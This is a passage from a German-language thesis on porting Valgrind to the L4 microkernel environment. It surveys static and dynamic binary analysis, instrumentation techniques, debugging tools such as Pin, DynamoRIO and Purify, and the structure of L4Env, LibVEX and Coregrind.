Die Qualität und Geschwindigkeit meiner Portierung bewerte ich in Kapitel „Aus-
wertung“. Abschließend gebe ich einen kurzen Ausblick und fasse die Ergebnisse
meiner Arbeit zusammen.
Danksagung
An dieser Stelle danke ich Prof. Dr. Hermann Härtig für die Möglichkeit, in
der Betriebssystemgruppe arbeiten zu dürfen. Mein besonderer Dank gilt auch
meinen Betreuern Michael Roitzsch und Björn Döbel. Sie haben mich in allen
Phasen meiner Arbeit sehr engagiert mit fachlicher Kompetenz und Kritik betreut.
Meinen Eltern danke ich an dieser Stelle dafür, dass Sie mir dieses Studium
ermöglichten. Meiner Freundin Michaela danke ich für die Geduld und Hilfe
während der Zeit. Dank an die geduldigen Korrekturleser Lucas, Borchert und
Martin für ihre Zeit und Mühe. Ebenfalls danke ich Maria, Michael, Steffen,
Julian, Dirk und Joe für die angenehme Arbeitsatmosphäre und die konstruktiven
Gespräche im Studentenlabor.
2
1 Einführung
Im ersten Teil möchte ich verschiedene Werkzeuge zum automatischen Testen
und Debuggen von Programmen vorstellen. Dazu sollen zuerst die verschiedenen
Analyse-Arten und deren Unterschiede erörtert werden. Daran anschließend
stelle ich die Ziel-Plattform meiner Portierung – L4 – vor.
1.1 Die Analyse
Wann erfolgt die Analyse?
Analysen können vor oder während der Ausführung des zu testenden Programmes
erfolgen. Dabei wird die Analyse vor der Ausführung als statisch und während
der Laufzeit als dynamisch bezeichnet [20]. (In dieser Arbeit bezeichne ich
Programme, die in Valgrind zur Analyse ausgeführt werden als Gäste.)
Diestatische Analyse erfolgt vor der Laufzeit des Programmes, d.h. das Gast-
Programm wird nicht ausgeführt. Als Folge dessen gibt es keine Testdaten bzw.
Testfälle. Die statische Analyse kann daher auch als formale Prüfung des Program-
mes bezeichnet werden. Statische Tester prüfen zum Beispiel auf Korrektheit,
suchen Optimierungsmöglichkeiten, visualisieren den Code oder suchen nach typi-
schen Programmierfehlern. Vorteil dieser Analyse ist, dass alle Ausführungspfade
des Gastes analysiert und geprüft werden können.
Im Gegensatz dazu steht die dynamische Analyse. Bei dieser wird das Gast-
Programm, während es ausgeführt wird, untersucht. Zur Untersuchung ist Analy-
secode notwendig, der, ohne die Programm-Ausführung des Gastes zu beeinflus-
sen, zusätzlich ausgeführt wird. Ziel des Analysecode ist allgemein das Sammeln
von Daten, Messen der Geschwindigkeit und das Suchen von Fehlern. Dabei
wird das Generieren und Hinzufügen des Analysecode während der Laufzeit als
Instrumentierung bezeichnet. Der Vorteil dieser Analyse ist, dass sie während der
Laufzeit stattfindet. Es wird also das Verhalten des Gastes unter realen Bedingun-
gen getestet. Resultierend daraus gibt es Testdaten und Testfälle. Von Nachteil ist,
dass immer nur ein Ausführungs-Pfad des Gastes analysiert werden kann.
3
1 Einführung
Welcher Code wird analysiert?
Je nach Ziel und Vorlage kann Quellcode oder Maschinencode analysiert wer-
den[20].
Bei der Quellcode -Analyse können High-Level Informationen, wie z.B. Varia-
blen, Funktionen, Ausdrücke usw. berücksichtigt werden. Beachtet werden sollte,
dass die Analyse von Quellcode immer abhängig von der Programmiersprache ist.
Vorteil bei der Analyse von Quellcode ist die Unabhängigkeit von der Plattform
(Architektur und Betriebssystem).
DieMaschinencode -Analyse hingegen ist sprachunabhängig, benötigt keinen
Quellcode, kann dadurch aber auch nur Low-Level (systemnahe) Informationen,
wie zum Beispiel Speicher, Register, Sprünge berücksichtigen. Oft wird bei der
Analyse von Maschinencode dieser nicht direkt, sondern eine Zwischensprache
(Bytecode) analysiert. Vorteil der Maschinencode-Analyse ist, dass auch Binaries
und Bibliotheken fremder Anbieter (ohne Vorlage von Quellcode) analysiert
werden können. Demgegenüber wirkt sich die Abhängigkeit von der Plattform
nachteilig aus.
Arten der Analyse
In den vorangegangen Abschnitten beschrieb ich, dass die Analyse statisch oder
dynamisch stattfinden und dabei Quell- oder Maschinencode untersucht werden
kann. Zusammen ergeben sich vier Arten der Analyse:
•Statische Quellcode-Analyse
•Statische Maschinencode-Analyse
•Dynamische Quellcode-Analyse
•Dynamische Maschinencode-Analyse
In meiner Arbeit steht die Dynamische Maschinencode-Analyse (DBA – Dy-
namic Binary Analysis ) im Mittelpunkt. Dazu möchte ich im Folgenden die Instru-
mentierung von Code – eine Grundlage von dynamischen Analysen – diskutieren.
Beim Instrumentieren wird dem zu untersuchenden Code zusätzlicher Analy-
secode hinzugefügt. Der zu untersuchende Code kann dabei Quellcode oder
Maschinencode sein. In meiner Arbeit will ich mich auf die Instrumentierung von
Maschinencode beschränken.
4
1.1 Die Analyse
Wie erfolgt die Instrumentierung?
Beim Instrumentieren werden dem Code des Gastes zusätzliche Anweisungen
hinzugefügt, welche die eigentliche Analyse durchführen bzw. Daten sammeln.
Die einfachste Variante ist die direkte Instrumentierung des Maschinencodes.
Dabei verlängert sich die Ausführungszeit des Gastes nur unwesentlich. Eine
aufwändigere Variante ist die Übersetzung des Maschinencodes in eine Zwischen-
sprache („intermediate representation“ IR), die dann instrumentiert wird. Bei
der Zwischensprache handelt es sich im Allgemeinen um RISC-Bytecode. Dieser
lässt sich wegen des einfachen Aufbaus leicht instrumentieren. Bei einer solchen
Analyse des Gastes ergeben sich damit mehr Möglichkeiten als bei der direkten
Instrumentierung des Maschinencodes. In den nächsten Absätzen erläutere ich
die direkte und indirekte Instrumentierung von Maschinencode.
BeiCopy-and-Annotate wird der Maschinencode direkt instrumentiert und
danach ausgeführt (siehe Abbildung 1.1). Dazu wird im ersten Schritt jede
Instruktion annotiert (kommentiert). Beim Annotieren werden die Effekte der
Instruktion beschrieben. Im zweiten Schritt nutzen Tools diese Beschreibungen,
um Analysecode zu generieren. Dieser wird im dritten Schritt in den originalen
Maschinencode eingefügt [21]. Vorteil dieser Methode ist, dass der Gast-Code
mit sehr wenigen Änderungen direkt ausgeführt werden kann.
Maschinencode
Maschinencode
BeschreibungenAnnotieren
Einfügen
AnalysecodeKopieren Instrumentieren
Abbildung 1.1: Copy & Annotate
Im Gegensatz dazu wird bei Disassemble & Resynthesize [21]im ersten
Schritt der Maschinencode in eine Zwischensprache übersetzt. Bei der Zwischen-
sprache handelt es sich in der Regel um Bytecode. Bei dieser Übersetzung werden
aus jeder Maschinencode-Instruktion ein oder mehrere Instruktionen der IR. Im
zweiten Schritt wird die IR instrumentiert, also Analysecode hinzugefügt. Im drit-
5
1 Einführung
ten Schritt wird der IR wieder zurück in Maschinencode übersetzt. Abbildung 1.2
zeigt die Struktur von Disassemble & Resynthesize, instrumentiert wird nur die
Zwischensprache des Maschinencodes.
Verglichen mit Copy-and-Annotate ist das Design und die Implementation
von Disassemble & Resynthesize komplexer und aufwändiger. Von Vorteil ist
Disassemble & Resynthesize, wenn komplexer Analysecode hinzugefügt werden
soll. Da der Analysecode und der Code des Gastes den gleichen IR nutzen, ist
sichergestellt, dass der Analysecode genauso ausdrucksstark ist wie der Code des
Gastes.
Maschinencode
Maschinencode
Zwischen-
Sprache(IR)Disassemble
ResynthesizeInstrumentieren
Abbildung 1.2: Disassemble & Resynthesize
Statische und Dynamische Instrumentierung von
Maschinencode
Die Idee dynamischer Maschinencode-Analysen ist es, den Gast mit Analysecode
zu instrumentieren. Dies kann vor oder während der Ausführung stattfinden.
Je nachdem wann die Instrumentierung stattfindet, ergeben sich unterschied-
liche Vor- und Nachteile bezüglich der Geschwindigkeit und des Umfangs der
Instrumentierung.
Wenn die Instrumentierung vor der Laufzeit des Programmes stattfindet, wird
diese als Static Binary Instrumentation (SBI) bezeichnet. Dabei wird vor der
Ausführung des Programmes der Code des Programmes modifiziert. Da diese
Modifikationen vor der Laufzeit erfolgen, ergeben sich nur sehr geringe Geschwin-
digkeitsverluste bei der Ausführung. Die Möglichkeiten bei der Instrumentierung
sind jedoch eingeschränkt. Zusätzliche Bibliotheken oder Code, der zur Laufzeit
nachgeladen oder generiert wird, kann nicht instrumentiert werden.
6
1.2 Debugging-Werkzeuge
Instrumentierung während der Laufzeit wird als Dynamic Binary Instrumen-
tation (DBI) bezeichnet. Dabei wird zur Laufzeit der Code des Gastes modifiziert.
Es ist nicht notwendig, das Gast-Binary neu zu übersetzen; jeglicher Gast-Code,
die verwendeten Bibliotheken und der generierte Code können instrumentiert
werden. Nachteilig wirken sich bei DBI die Geschwindigkeitsverluste aus, die
entstehen, weil die Instrumentierung während der Laufzeit stattfindet. Meist
erfolgt die Ausführung des Gastes in DBI-Frameworks in Form von Blöcken ( Basic
Blocks ).
1.2 Debugging-Werkzeuge
In den folgenden Abschnitten möchte ich einige ausgewählte Werkzeuge zum
Analysieren und Testen von Programmen vorstellen. Abschließend werde ich die
vorgestellten Werkzeuge vergleichen.
Pin
Ziel von Pin [14]ist es, eine Plattform zum Erstellen von Analyse-Tools für unter-
schiedliche Architekturen zur Verfügung zu stellen. Dazu bietet es die Möglichkeit,
Gast-Programme mittels dynamisch Instrumentierung von Maschinencode zu
untersuchen. Pin unterstützt die Analyse von Linux- (ARM, x86, ia64, x86 /64),
Windows- (x86, x86 /64) oder MacOSX- (x86) Programmen.
Neben der Möglichkeit, während der Laufzeit den Code des Gastes zu instru-
mentieren, können mit Pin auch bereits laufende Prozesse analysiert werden. Um
schnell Tools auf Basis von Pin bauen zu können, stellt Pin eine API zur Verfügung.
Diese abstrahiert den darunterliegenden Befehlssatz und ermöglicht Zugriff auf
Kontext- (z.B. Register-Inhalte) und Debug-Informationen.
Zu dem zu analysierenden Code kann mit Pin durch Einfügen von Funktions-
aufrufen Analysecode hinzufügt werden. Einfache Analyse-Routinen fügt Pin
direkt ein. Mit dem Analysecode können die Inhalte von Register und Speicher
zur Laufzeit analysiert und modifiziert werden.
Die Pin-Distribution beinhaltet viele architekturunabhängige Beispiel-Tools,
z.B. Profiler, Cachesimulatoren und Speicherdebugger. Mit Hilfe dieser können
schnell neue Pintools entwickelt werden.
Pin steht unter der Intel Open Source License, der Quellcode ist jedoch nicht
frei erhältlich. Die mitgelieferten Beispiel-Pintools sind Open Source und stehen
unter einer BSD-artigen Lizenz.
7
1 Einführung
DynamoRIO
DynamoRIO (RIO - run time introspection and optimisation) ist ein System zur
Modifikation von Maschinencode [7], entwickelt von Hewlett-Packard und dem
Massachusetts Institute of Technology (MIT) im Jahr 2001. Es ermöglicht die
Instrumentierung und Optimierung von Code während der Laufzeit. Unterstützt
werden Windows- (x86) und Linux- (x86) Programme.
Für die Modifikation und für das Hinzufügen von Code bietet DynamoRIO eine
gut dokumentierte API. Mit Hilfe dieser kann direkt in den ursprünglichen Code
der Analysecode eingefügt werden. Weiterhin bietet die API Unterstützung für den
Aufruf von C-Funktionen aus dem instrumentieren Code heraus. Außerdem stellt
die API Funktionalität zum Sichern und Wiederherstellen von Registerinhalten
bereit.
DynamoRIO ist praktisch einsetzbar, da Programme wie Microsoft Office oder
Mozilla analysiert werden können. Es können Tools zur dynamischen Optimie-
rung, zum Profiling oder zur dynamischen Instrumentierung entwickelt werden.
DynamoRIO ist unter der DynamoRIO License lizenziert und für den internen
Gebrauch kostenlos nutzbar.
DIOTA
DIOTA (Dynamic Instrumentation, Optimization and Transformation of Appli-
cations) ist ein Framework zur dynamischen Instrumentierung von Maschinen-
code [12]. Zu DIOTA gehören viele Tools zum Debuggen von Speicher, zum
Finden von Deadlocks, zum Verfolgen von Speicherzugriffen.
Mit DIOTA können Speicheroperationen instrumentiert, Systemaufruf-Para-
meter modifiziert oder Aufrufe dynamisch gelinkter Funktionen umgeleitet wer-
den. Zusätzlich können am Ende jedes ausgeführten Codeblocks oder beim Zugriff
auf bestimmte Speicherbereiche Funktionen aufgerufen werden. Außerdem kann
DIOTA mit Threads, positionsunabhängigem Code, Signalen und selbstmodifizie-
rendem Code umgehen. Um selbstmodifizierenden Code zu unterstützen, werden
bereits übersetzte Codeblöcke durch DIOTA als schreibgeschützt markiert. Sobald
schreibende Zugriffe auf die geschützten Codeblöcke stattfinden, kann DIOTA
diese neu übersetzen.
Mit DIOTA können Linux- (x86) Programme wie beispielsweise die Webbrowser
Mozilla und Konqueror analysiert werden. Es steht unter der GNU General Public
License (GPL) und ist kostenlos erhältlich.
8
1.2 Debugging-Werkzeuge
Dyninst
Dyninst, entwickelt an der University of Wisconsin-Madison und der University of
Maryland, ermöglicht das Einfügen von Code in ein laufendes Programm [8]. Da-
bei ist es nicht notwendig, das Programm neu zu kompilieren, neu zu linken oder
neu auszuführen. Dyninst basiert auf der Idee der dynamischen Instrumentierung
von Maschinencode. Mit Dyninst können Profiling-Werkzeuge, Debugger und
Anwendungen zur interaktiven Steuerung und Visualisierung einer laufenden
Computersimulation entwickelt werden.
Realisiert als Bibliothek, können mit Dyninst Programme zur Laufzeit instru-
mentiert werden. Umgesetzt wird die Instrumentierung durch einen „Mutator-
Prozess“. Mit diesem kann während Laufzeit Code eingefügt oder entfernt werden.
Dyninst bietet eine API, um architekturunabhängige Analyse-Tools zu entwickeln.
Mit der API können beispielsweise Argumente und Rückgabewerte bei Funkti-
onsaufrufen analysiert oder der Funktionsaufruf ersetzt werden. Das Einfügen
von Code geschieht durch das Einfügen von Sprungbefehlen in den originalen
Code. Durch die Sprungbefehle wird der einzufügende Code angesprungen und
ausgeführt.
Mit Dyninst können große Programme wie Microsoft Office oder MySQL un-
tersucht werden. Dabei werden die Plattformen Linux (x86 und ia64), Windows
(x86), Solaris (SPARC), AIX (PowerPC), IRIX (MIPS) und Tru64 Unix (Alpha) un-
terstützt. Dyninst ist frei für Forschungszwecke erhältlich, die Weitergabe bedarf
jedoch der Zustimmung von Paradyn.
Purify
Purify ist ein Debugger zum Finden von Speicherzugriffs-Fehlern in C- oder
C++- Programmen [9]. Ursprünglich wurde es von Reed Hastings bei Pure
Software entwickelt, zur Zeit wird es bei IBM weiterentwickelt. Basierend auf
dynamischer Instrumentierung von Maschinencode protokolliert und kontrolliert
Purify jeden Speicherzugriff. Dadurch können Zugriffe auf nicht allozierten oder
nicht initialisierten Speicher gefunden werden. Weiterhin können Memory Leaks
(allozierte Speicherbereiche, auf die kein Zeiger verweist) erkannt werden. Für die
Analyse mit Purify wird kein Quellcode benötigt; somit können auch Bibliotheken
von Fremdanbietern getestet werden.
Mit Purify können Programme für Windows (x86,x86 /64), Solaris (SPARC,
x86, x86 /64), HP-Unix (ia64, PA-RISC) und Linux (x86, x86 /64) untersucht
werden. Purify ist proprietäre Software, die bei IBM käuflich erworben werden
kann [25].
9
1 Einführung
Insure++
Insure ++ist ein Analyse- und Test-Werkzeug für C und C ++Programme [1]. Mit
Insure ++können automatisch Fehler bei Speicherzugriffen, Fehler bei Zugriffen
auf Arrays, Memory Leaks und invalide Zeiger gefunden werden. Während der
Analyse überprüft Insure ++alle Typen von Speicherreferenzen, speziell Refe-
renzen auf Stack und gemeinsam genutzten Speicher. Dabei wird aller Code des
Programmes inklusive Fremd-Bibliotheken analysiert.
Mit Insure ++kann Quellcode oder Maschinencode instrumentiert werden.
Dazu bietet Insure drei verschiedene Arten der Analyse:
•Vollständige Instrumentierung des Quellcodes: Dazu ist der Quellcode not-
wendig. Insure ++generiert daraus instrumentierten Code und übersetzt
diesen.
•Statisches Linken: Insure ++wird Teil des zu untersuchenden Programms.
Analysefunktionen werden direkt zum Maschinencode hinzugefügt.
•Chaperon: Nur für dynamisch gelinkte Linux-Programme. Insure ++wird
in Form einer dynamisch ladbaren Bibliothek zum Maschinencode des zu
untersuchenden Programms hinzugefügt.
Mit Insure ++können Windows- (x86, x86 /64), Linux- (x86, x86 /64), Solaris-
(UltraSPARC), AIX- (PowerPC) und HP-Unix- (PA-RISC) Programme analysiert
werden. Insure ++ist proprietäre Software und kann von Parasoft [5]käuflich
erworben werden.
Valgrind
Valgrind ist ein Framework zum Entwickeln von Analyse-Tools. Es basiert auf
der dynamischen Maschinencode-Analyse. Gast-Programme können während der
Laufzeit instrumentiert und damit untersucht werden. Da Valgrind Maschinenco-
de analysiert, ist die Untersuchung von der Programmiersprache unabhängig. Der
gesamte Code des Gastes sowie die verwendeten Bibliotheken können untersucht
werden. Die Instrumentierung findet zur Laufzeit statt, der Gast kann also unter
realen Bedingungen getestet und analysiert werden.
Zur Instrumentierung wird der Maschinencode des Gastes in eine Zwischen-
sprache übersetzt. Diese kann durch die Tools instrumentiert werden; dabei wird
Code hinzugefügt, modifiziert oder ausgetauscht. Weiterhin unterstützt Valgrind
Shadow Values . In diesen können für Register und Speicher Metainformationen
gespeichert werden. Shadow Values werden beispielsweise genutzt, um fehlerhaf-
te Speicherzugriffe zu erkennen. Dazu vermerkt Valgrind in den Shadow Values
10
1.3 L4: Mikrokern und Multi-Server-OS
für jedes einzelne genutzte Byte Speicher, ob dieses adressierbar und gültig ist.
Nach dem Instrumentieren der Zwischensprache wird diese in Maschinencode
übersetzt und ausgeführt.
Mit Memcheck – dem ersten Valgrind-Tool – können Fehler wie beispielswei-
se Puffer-Überläufe, Memory-Leaks oder Lese- und Schreibzugriffe auf nicht
allozierten Speicher erkannt werden.
Valgrind ist zur Zeit für Linux (x86, x86 /64, PPC32 /64) und MacOS (x86,
x86/64) verfügbar. Lizenziert ist Valgrind unter der GNU General Public License
und frei erhältlich.
Vergleich
Ziel meiner Arbeit ist die Untersuchung und Portierung eines Werkzeuges zur
dynamischen Maschinencode-Analyse von Programmen. Voraussetzung für eine
Portierung ist die Verfügbarkeit des Quellcodes und eine freie Lizenz des zu
portierenden Programmes. Frameworks zum Erstellen von Analyse-Werkzeugen
haben im Unterschied zu einzelnen monolitischen Analyse-Werkzeugen den Vor-
teil, dass weitere Werkzeuge entwickelt werden können (die auf den Frameworks
basieren).
In Tabelle 1.1 habe ich die in den vorangegangenen Abschnitten vorgestellten
Tools gegenübergestellt. Nur von Valgrind, DIOTA und Dyninst ist der Quelltext
frei verfügbar. Dyninst ist für sehr viele Plattformen verfügbar, steht jedoch unter
keiner freien Lizenz. Valgrind ist, verglichen mit DIOTA, für mehr Plattformen
verfügbar und hat damit die besseren Voraussetzungen für eine Portierung.
Mit auf Valgrind basierenden Analyse-Tools können Programme während der
Laufzeit untersucht werden. Neben der Möglichkeit, neue Tools auf Basis von
Valgrind zu entwickeln, bringt Valgrind bereits Standard-Tools mit. Diese eignen
sich zur Fehlersuche und zum Profiling von Anwendungen. Da Valgrind frei
verfügbar ist und gute Voraussetzungen für automatisches Testen und Debugging
bietet, entschied ich mich, Valgrind auf L4 zu portieren.
1.3 L4: Mikrokern und Multi-Server-OS
L4 ist eine Familie von Mikrokernen der zweiten Generation, ursprünglich ent-
wickelt und implementiert von Jochen Liedtke [17]. Liedtkes Implementierung
war vor allem auf Leistung optimiert und zu diesem Zweck direkt in Assemb-
ler geschrieben. Bei anderen Implementationen der L4 ABI (Applikation Binary
Interface), zum Beispiel bei L4Ka::Pistachio (Universität Karlsruhe), L4 /MIPS
(University of New South Wales) und Fiasco (Technische Universität Dresden)
11
1 Einführung
Name Art Plattform Ausführung Quelltext
Host OS [20] verfügbar
Pin F x86,ia64 Linux, Windows C nein
x86/64,Xscale MacOS
DynamoRIO F x86 Linux, Windows C, O nein
DIOTA F x86 Linux C, O ja
Dyninst F x86, ia64 Linux, Windows N ja
SPARC, PPC Solaris, AIX
MIPS, Alpha IRIX, Tru64 UX
Purify M x86, x86 /64 Linux, Windows, N nein
SPARC, ia64 Solaris,
PA-RISC HP-UNIX
Insure ++ M x86, x86 /64 Linux, Windows, N, C nein
UltraSPARC Solaris, AIX,
PPC, PA-RISC HP-Unix
Valgrind F x86,x86 /64 Linux, AIX C ja
PPC32 /64 MacOSX,
FreeBDS
Art: Ausführung:
F Framework C dynamische Übersetzung von Maschinencode mit Caching
M monolitisches O dynamische Optimierung von Maschinencode
Analyse-Werkzeug N normale Ausführung, mit Sprüngen in Analysecode
Tabelle 1.1: Vergleich der vorgestellten Analyse-Werkzeuge
liegt der Fokus auf Sicherheit, Isolation und Robustheit. Mikrokerne zweiter
Generation sind nach folgendem Prinzip von Jochen Liedtke entworfen:
„. . . a concept is tolerated inside the micro-kernel only if moving
it outside the kernel, i.e. permitting competing implementations,
would prevent the implementation of the system’s required functio-
nality.“ [17]
Das heißt, dass nur die primitivsten Mechanismen und Abstraktionen im Kern
implementiert werden. Unabdingbare Abstraktionen im Kern sind Threads und
Adressräume. Notwendige Mechanismen sind Kommunikation, Scheduling und
Mappings.
Programme werden, wie bei monolithischen Kernen, im Nutzermodus ausge-
führt. Während bei monolithischen Systemen die meisten Ressourcen und Dienste
(z.B. Speicher, Dateien, Netzwerk) direkt vom Kern verwaltet werden, findet in
mikrokern-basierten Systemen die Verwaltung von Ressourcen im Nutzermodus
statt.
12
1.4 L4Env
Die Verwaltung von Ressourcen auf mikrokern-basierten Systemen kann auf
zwei verschiedene Arten erfolgen: Entweder erfolgt die Realisierung als monolithi-
sches Programm, dabei wird es als Single-Server-OS bezeichnet. Alle Ressourcen
des Systems werden von einem Server zur Verfügung gestellt. Demgegenüber wird
die Verwaltung von Ressourcen durch ein verteiltes System als Multi-Server-OS
bezeichnet. Dabei bieten verschiedene Server Dienste an oder stellen Ressourcen
zur Verfügung.
1.4 L4Env
DasL4Env (L4 Environment ) ist eine Umgebung zur Entwicklung von Program-
men, die auf L4-Mikrokernen basieren [23]. Es wurde als Teil des Dresden
Real-Time Operating System (DROPS) entwickelt. Die Idee des L4Env ist die
Bereitstellung einer minimalen Umgebung zur Entwicklung von L4-basierten
Programmen. In Abbildung 1.3 sind der Aufbau und die Komponenten des L4Env
dargestellt.
loader
names
 log
con
dm_phys
 l4io
 bmodfs
rtc
L4-kompatibler Mikrokern (z.B. Fiasco)Programme
L4Env Server
Kern
L4 Programme
Bibliotheken, z.B. thread, semaphore, l4rm
Abbildung 1.3: Aufbau des L4Env
Dazu stellt das L4Env Server und Bibliotheken zur Verfügung. Die Server
dienen zur Verwaltung von System-Ressourcen, wie Speicher, Tasks und I /O.
Die Bibliotheken ermöglichen den Zugriff auf die von den Servern verwalteten
Ressourcen und stellen darüber hinaus zusätzliche Funktionalität bereit.
In Tabelle 1.2 erläutere ich einige ausgewählte Server und Bibliotheken.
13
1 Einführung
Server
•Roottask stellt Ressourcen wie physischen Speicher, Interrupts und Tasks
bereit.
•L4IO ist ein einfacher I /O Manager, der den Zugriff auf Interrupts, I /O-Ports
und PCI-Geräte bietet.
•Loader +simple_ts ermöglicht das Starten und Beenden von Programmen
zur Laufzeit.
•Con,Logsind Konsolen, die zur Ein- und Ausgabe während der Laufzeit
im L4Env dienen.
•DMphys stellt physischen Speicher zur Verfügung.
•Names ist ein Namensdienst, der Threads das Registrieren und Abfragen
von IDs und Namen ermöglicht.
•Simple File Server ist ein einfacher Dateiserver des L4Env, der den Zugriff
auf Dateien ermöglicht.
Bibliotheken
•L4rm Der L4-Region-Mapper, verwaltet den virtuellen Adressraum einer
Task und ist gleichzeitig Pager.
•Semaphore +Lock stellt Semaphoren und Locks zur Synchronisation zur
Verfügung.
•Thread ist eine Thread-Bibliothek, die das Starten und Beenden von
Threads ermöglicht.
Tabelle 1.2: Server und Bibliotheken des L4Env
14
2 Valgrind
In diesem Kapitel stelle ich das Framework Valgrind vor. Dieses führt zur Analyse
und zum Testen auf einer virtuellen CPU Gast-Programme aus. Während der
Ausführung des Gastes in Valgrind kann das Gast-Programm untersucht werden.
Mit seinem Aufbau beginnend stelle ich wichtige Teile und Mechanismen
von Valgrind vor. Ziel dieses Kapitels ist es, die Funktionsweise von Valgrind zu
erläutern und damit Grundlagen zu legen, die für das Verständnis des nächsten
Kapitels – die Portierung – wichtig sind.
2.1 Der Aufbau Valgrinds
Valgrind ist eine Programmier-Distribution, die zur Entwicklung von Debugging-
Werkzeugen (Tools) [22]dient. Es besteht aus Tools, LibVEX und Valgrinds
Core (Coregrind), letztere stellen das Valgrind-Framework dar. Um vollständige
Kontrolle über die Ausführung des Gastes zu erhalten, verwendet Valgrind die
Methode der dynamischen Übersetzung von Maschinencode [21]. Dieser Ansatz
besitzt zwei Vorteile:
•Umfang: Jeglicher Code des Gastes sowie die genutzten Bibliotheken kön-
nen ohne Vorlage des Quellcodes analysiert werden.
•Vereinfachung: Weder der Gast noch die Bibliotheken müssen neu übersetzt,
neu gelinkt oder anderweitig modifiziert werden.
Aufgabe der LibVEX ist die Übersetzung des Gast-Codes. Dessen Ausführung
wiederum wird durch Coregrind gesteuert. Die Instrumentierung des Gastes, das
Sammeln von Laufzeitinformationen sowie deren Auswertung wird von den Tools
durchgeführt. (In dieser Arbeit bezeichne ich die Ausführung eines Gastes in
Valgrind als interpretierte Ausführung.)
Zur modularen Gestaltung Valgrinds dient der Valgrind-Loader. Dieser entschei-
det je nach Kommandozeilen-Argument, welches Tool gestartet werden soll. Das
Tool selbst besteht aus der LibVEX, Coregrind und dem eigentlichen Tool-Code.
15
2 Valgrind
2.2 Geschichte und aktueller Status
Valgrind wurde erstmals 2002 als monolithischer „Speicherchecker“ für C- und
C++- Programme vorgestellt [21]. Durch das Entwickeln weiterer Werkzeuge
auf der Basis von Valgrind wurde aus dem „Speicherchecker“ ein Framework zum
Erstellen von Analyse-Tools. Valgrinds Core unterstützt systemnahe Instrumen-
tierung von Programmen. Dazu beinhaltet es einen Just-In-Time (JIT) Compiler,
eine einfache C-Bibliothek, Unterstützung für Signale und einen Scheduler für
die Ausführung von Threads.
Valgrind ist freie Software, lizenziert unter der General Public Licence (GPL).
Momentan läuft es auf Linux, AIX und MacOSX. Es ermöglicht die Analyse von
Programmen wie Mozilla und OpenOffice.
Die folgende Liste enthält Tools, die auf dem Framework Valgrind basieren. Sie
gibt einen Überblick über die Möglichkeiten der Analyse mit Valgrind:
•Memcheck ist ein „Speicherchecker“, zum automatisierten Suchen von
Speicherverwaltungsproblemen.
•Cachegrind ist ein Cache-Profiler.
•Callgrind ist eine Erweiterung von Cachegrind, die die Darstellung von
Funktionsaufrufgraphen ermöglicht.
KCachegrind stellt die Ergebnisse von Cachegrind und Callgrind visuell
dar.
•Massif ist ein Heap-Profiler.
•Helgrind +DRD dienen zum Debuggen von Threads.
•iogrind ist ein I /O-Profiling Tool.
•Redux erstellt dynamische Datenflussgraphen für die gesamte Programm-
ausführung.
•Annelid ist ein Bounds-Checker .
•Crocus prüft die Benutzung von Signalen.
•Interactive bringt eine GDB-artige Schnittstelle zum Debugging mit.
•VGprof ist ein gprof -artiger Profiler.
•Cachetool generiert Memory-Traces .
•Valgrind /Wine dient zum Debugging von Windows-Programmen.
16
2.3 Das Valgrind-Framework LibVEX & Coregrind
2.3 Das Valgrind-Framework LibVEX &
Coregrind
Die LibVEX [4]und Valgrinds Core bilden zusammen das Valgrind-Framework.
Mit dessen Hilfe können Tools zur dynamischen Maschinencode-Analyse von
Programmen erstellt werden.
Die LibVEX ist ein Just-In-Time Compiler für die Architekturen x86, x86 /64,
ARM und PPC. Sie arbeitet mit statisch oder dynamisch gelinkten ELF-Binaries.
Diese müssen weder neu kompiliert, neu gelinkt noch modifiziert werden. Der
Gast-Code wird in Bytecode, genauer in UCode , übersetzt. Dabei handelt es sich
um einen RISC-artigen Zwei-Adress-Bytecode. Jedes Register der simulierten CPU
wird in den Speicher abgebildet.
Die Übersetzung findet während der Laufzeit statt. Der Gast-Code wird block-
weise übersetzt und ausgeführt. Die Blöcke – Basic Blocks – sind Maschinencode-
Sequenzen, die an Funktions-Einsprungpunkten beginnen und mit einem den
Kontrollfluss beeinflussenden Befehl ( jump , call , return , int) enden.
Die blockweise Übersetzung von Maschinencode in Bytecode und umgekehrt
verläuft in 5 Phasen:
(i)Disassemblieren: Jede Maschinen-Instruktion wird in eine oder mehrere
UCode-Instruktionen übersetzt. Dabei werden virtuelle Register benutzt.
(ii)Optimierung: Redundanter UCode, der durch den einfachen Disassembler
entsteht, wird entfernt.
(iii) Instrumentierung: Das Tool fügt zusätzliche Instruktionen (Analysecode)
hinzu.
(iv) Registerallokation: Die virtuellen Register werden auf reale Register abge-
bildet.
(v)Code-Generierung: Jede UCode-Instruktion wird in eine oder mehrere Ma-
schinen-Instruktionen übersetzt. Manche Instruktionen werden durch As-
sembler- und C-Funktionsaufrufe ersetzt.
Übersetzte Blöcke werden zwischengespeichert, um so die Geschwindigkeits-
verluste bei der Ausführung gering zu halten. Am Ende jedes Blockes wird der
nächste Block im Cache gesucht, gegebenenfalls neu übersetzt und ausgeführt.
Um selbst modifizierenden Code zu unterstützen, wird bei der Übersetzung
eines Code-Blockes zusätzlich dessen Hash-Summe gespeichert. Vor der Ausfüh-
rung eines Blocks überprüft Valgrind die Hash-Summe und übersetzt den Block
17
2 Valgrind
gegebenenfalls neu. Zudem kann der Gast Valgrind explizit auffordern, bestimm-
te zwischengespeicherte Blöcke zu verwerfen und neu zu übersetzten. Dies ist
notwendig, um zum Beispiel JIT-Compiler in Valgrind ausführen zu können [22].
Die LibVEX wird von OpenWorks LLP entwickelt. Sie ist ein grundsätzlicher
Bestandteil von Valgrind. Zur Nutzung der LibVEX in Projekten, die unter der
GPL stehen, bietet OpenWorks LLP ein duales Lizenzierungsschema. Projekte, die
unter der GPL lizenziert sind, dürfen die LibVEX nutzen (diese steht dann auch
unter der GPL). Für die Nutzung der LibVEX in anderen Projekten muss eine
Lizenz von OpenWorks LLP erworben werden.
Coregrind ist für die Ausführung des Gastes zuständig. Dazu verfügt es über
einen Scheduler, der die Ausführung der Code-Blöcke des Gastes steuert. Außer-
dem ist Valgrinds Core für die Behandlung von Gast-Anfragen, Systemaufrufen,
für die Speicherverwaltung und das Scheduling von Threads verantwortlich. Die
Tools können mit Hilfe von Valgrinds Core die Ausführung des Gastes beeinflus-
sen.
Details zu den Komponenten von Valgrinds Core erläutere ich in den folgenden
Abschnitten.
2.4 Der Start von Valgrind unter Linux
Um später die Unterschiede beim Start von Valgrind auf L4 darstellen zu können,
möchte ich im Folgenden wichtige Punkte beim Start von Valgrind auf Linux
vorstellen.
